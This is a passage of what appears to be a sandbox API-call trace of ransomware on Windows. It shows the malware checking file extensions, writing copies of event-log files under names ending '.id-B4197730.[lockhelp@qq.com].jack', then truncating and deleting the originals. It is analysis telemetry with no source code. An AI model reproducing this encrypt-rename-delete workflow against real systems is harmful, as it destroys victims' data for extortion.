(lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0209.598] lstrlenW (lpString=".1cd") returned 4 [0209.598] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.598] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0209.598] lstrlenW (lpString=".jpg") returned 4 [0209.598] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.598] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0209.598] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0209.599] lstrlenW (lpString=".doc") returned 4 [0209.599] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.599] lstrlenW (lpString=".docx") returned 5 [0209.599] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.599] lstrlenW (lpString=".pdf") returned 4 [0209.599] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.599] lstrlenW (lpString=".xls") returned 4 [0209.599] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.599] lstrlenW (lpString=".xlsx") returned 5 [0209.599] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.599] lstrlenW (lpString=".ppt") returned 4 [0209.599] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.599] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0209.599] lstrlenW (lpString=".zip") returned 4 [0209.599] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.599] lstrlenW (lpString=".rar") returned 4 [0209.599] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.599] lstrlenW (lpString=".bz2") returned 4 [0209.599] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.599] lstrlenW (lpString=".7z") returned 3 [0209.599] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.599] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0209.599] lstrlenW (lpString=".dbf") returned 4 [0209.599] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.599] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0209.599] lstrlenW (lpString=".1cd") returned 4 [0209.599] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.599] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0209.599] lstrlenW (lpString=".jpg") returned 4 [0209.599] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.599] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.599] lstrlenW (lpString="Microsoft-Windows-MUI%4Operational.evtx") returned 39 [0209.600] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0209.600] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0209.600] CloseHandle (hObject=0x430) returned 1 [0209.600] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx")) returned 0x20 [0209.600] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.611] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0209.611] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.611] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.611] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0209.616] GetLastError () returned 0x0 [0209.616] ReadFile (in: hFile=0x3dc, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0209.619] WriteFile (in: hFile=0x420, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0209.620] ReadFile (in: hFile=0x3dc, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0209.620] WriteFile (in: hFile=0x420, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x122, lpOverlapped=0x0) returned 1 [0209.620] SetEndOfFile (hFile=0x420) returned 1 [0209.620] CloseHandle (hObject=0x420) returned 1 [0209.622] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.622] SetEndOfFile (hFile=0x3dc) returned 1 [0209.623] CloseHandle (hObject=0x3dc) returned 1 [0209.623] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.623] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx")) returned 1 [0209.624] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0209.624] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0209.624] lstrlenW (lpString=".doc") returned 4 [0209.624] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.624] lstrlenW (lpString=".docx") returned 5 [0209.624] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.624] lstrlenW (lpString=".pdf") returned 4 [0209.624] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.624] lstrlenW (lpString=".xls") returned 4 [0209.624] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.624] lstrlenW (lpString=".xlsx") returned 5 [0209.624] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.624] lstrlenW (lpString=".ppt") returned 4 [0209.624] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.624] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0209.624] lstrlenW (lpString=".zip") returned 4 [0209.624] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.624] lstrlenW (lpString=".rar") returned 4 [0209.624] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.624] lstrlenW (lpString=".bz2") returned 4 [0209.624] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.624] lstrlenW (lpString=".7z") returned 3 [0209.624] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.624] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0209.624] lstrlenW (lpString=".dbf") returned 4 [0209.624] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.624] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0209.624] lstrlenW (lpString=".1cd") returned 4 [0209.624] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.624] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0209.624] lstrlenW (lpString=".jpg") returned 4 [0209.625] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.625] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0209.625] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0209.625] lstrlenW (lpString=".doc") returned 4 [0209.625] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.625] lstrlenW (lpString=".docx") returned 5 [0209.625] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.625] lstrlenW (lpString=".pdf") returned 4 [0209.625] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.625] lstrlenW (lpString=".xls") returned 4 [0209.625] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.625] lstrlenW (lpString=".xlsx") returned 5 [0209.625] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.625] lstrlenW (lpString=".ppt") returned 4 [0209.625] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.625] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0209.625] lstrlenW (lpString=".zip") returned 4 [0209.625] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.625] lstrlenW (lpString=".rar") returned 4 [0209.625] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.625] lstrlenW (lpString=".bz2") returned 4 [0209.625] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.625] lstrlenW (lpString=".7z") returned 3 [0209.625] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.625] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0209.625] lstrlenW (lpString=".dbf") returned 4 [0209.625] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.625] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0209.625] lstrlenW (lpString=".1cd") returned 4 [0209.625] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.625] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0209.625] lstrlenW (lpString=".jpg") returned 4 [0209.625] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.626] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.626] lstrlenW (lpString="Microsoft-Windows-NCSI%4Operational.evtx") returned 40 [0209.626] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0209.626] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0209.626] CloseHandle (hObject=0x3dc) returned 1 [0209.626] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx")) returned 0x20 [0209.626] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.626] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0209.626] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.626] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.626] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0209.629] GetLastError () returned 0x0 [0209.629] ReadFile (in: hFile=0x3dc, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0209.671] WriteFile (in: hFile=0x430, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0209.672] ReadFile (in: hFile=0x3dc, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0209.672] WriteFile (in: hFile=0x430, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x124, lpOverlapped=0x0) returned 1 [0209.672] SetEndOfFile (hFile=0x430) returned 1 [0209.678] CloseHandle (hObject=0x430) returned 1 [0209.679] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.680] SetEndOfFile (hFile=0x3dc) returned 1 [0209.681] CloseHandle (hObject=0x3dc) returned 1 [0209.681] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.681] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx")) returned 1 [0209.682] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0209.682] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0209.682] lstrlenW (lpString=".doc") returned 4 [0209.682] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.682] lstrlenW (lpString=".docx") returned 5 [0209.682] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.682] lstrlenW (lpString=".pdf") returned 4 [0209.682] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.682] lstrlenW (lpString=".xls") returned 4 [0209.682] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.682] lstrlenW (lpString=".xlsx") returned 5 [0209.682] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.682] lstrlenW (lpString=".ppt") returned 4 [0209.682] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.682] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0209.682] lstrlenW (lpString=".zip") returned 4 [0209.682] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.682] lstrlenW (lpString=".rar") returned 4 [0209.682] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.682] lstrlenW (lpString=".bz2") returned 4 [0209.682] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.682] lstrlenW (lpString=".7z") returned 3 [0209.682] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.682] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0209.682] lstrlenW (lpString=".dbf") returned 4 [0209.682] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.682] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0209.682] lstrlenW (lpString=".1cd") returned 4 [0209.682] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.682] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0209.682] lstrlenW (lpString=".jpg") returned 4 [0209.683] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.683] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0209.683] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0209.683] lstrlenW (lpString=".doc") returned 4 [0209.683] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.683] lstrlenW (lpString=".docx") returned 5 [0209.683] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.683] lstrlenW (lpString=".pdf") returned 4 [0209.683] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.683] lstrlenW (lpString=".xls") returned 4 [0209.683] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.683] lstrlenW (lpString=".xlsx") returned 5 [0209.683] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.683] lstrlenW (lpString=".ppt") returned 4 [0209.683] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.683] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0209.683] lstrlenW (lpString=".zip") returned 4 [0209.683] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.683] lstrlenW (lpString=".rar") returned 4 [0209.683] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.683] lstrlenW (lpString=".bz2") returned 4 [0209.683] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.683] lstrlenW (lpString=".7z") returned 3 [0209.683] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.683] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0209.683] lstrlenW (lpString=".dbf") returned 4 [0209.683] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.683] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0209.683] lstrlenW (lpString=".1cd") returned 4 [0209.683] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.683] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0209.683] lstrlenW (lpString=".jpg") returned 4 [0209.683] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.684] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.684] lstrlenW (lpString="Microsoft-Windows-Ntfs%4WHC.evtx") returned 32 [0209.684] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0209.685] GetFileSizeEx (in: hFile=0x41c, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0209.685] CloseHandle (hObject=0x41c) returned 1 [0209.685] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx")) returned 0x20 [0209.685] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.686] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0209.686] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.686] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.686] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0209.687] GetLastError () returned 0x0 [0209.687] ReadFile (in: hFile=0x41c, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0209.691] WriteFile (in: hFile=0x44c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0209.692] ReadFile (in: hFile=0x41c, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0209.692] WriteFile (in: hFile=0x44c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x114, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x114, lpOverlapped=0x0) returned 1 [0209.692] SetEndOfFile (hFile=0x44c) returned 1 [0209.692] CloseHandle (hObject=0x44c) returned 1 [0209.694] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.694] SetEndOfFile (hFile=0x41c) returned 1 [0209.695] CloseHandle (hObject=0x41c) returned 1 [0209.695] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.696] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx")) returned 1 [0209.696] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0209.696] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0209.696] lstrlenW (lpString=".doc") returned 4 [0209.696] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.696] lstrlenW (lpString=".docx") returned 5 [0209.696] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.696] lstrlenW (lpString=".pdf") returned 4 [0209.696] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.696] lstrlenW (lpString=".xls") returned 4 [0209.696] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.696] lstrlenW (lpString=".xlsx") returned 5 [0209.696] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.696] lstrlenW (lpString=".ppt") returned 4 [0209.697] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.697] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0209.697] lstrlenW (lpString=".zip") returned 4 [0209.697] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.697] lstrlenW (lpString=".rar") returned 4 [0209.697] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.697] lstrlenW (lpString=".bz2") returned 4 [0209.697] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.697] lstrlenW (lpString=".7z") returned 3 [0209.697] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.697] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0209.697] lstrlenW (lpString=".dbf") returned 4 [0209.697] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.697] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0209.697] lstrlenW (lpString=".1cd") returned 4 [0209.697] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.697] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0209.697] lstrlenW (lpString=".jpg") returned 4 [0209.697] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.697] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0209.697] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0209.697] lstrlenW (lpString=".doc") returned 4 [0209.697] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.697] lstrlenW (lpString=".docx") returned 5 [0209.697] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.697] lstrlenW (lpString=".pdf") returned 4 [0209.697] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.697] lstrlenW (lpString=".xls") returned 4 [0209.698] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.698] lstrlenW (lpString=".xlsx") returned 5 [0209.698] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.698] lstrlenW (lpString=".ppt") returned 4 [0209.698] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.698] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0209.698] lstrlenW (lpString=".zip") returned 4 [0209.698] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.698] lstrlenW (lpString=".rar") returned 4 [0209.698] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.698] lstrlenW (lpString=".bz2") returned 4 [0209.698] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.698] lstrlenW (lpString=".7z") returned 3 [0209.698] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.698] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0209.698] lstrlenW (lpString=".dbf") returned 4 [0209.698] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.698] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0209.698] lstrlenW (lpString=".1cd") returned 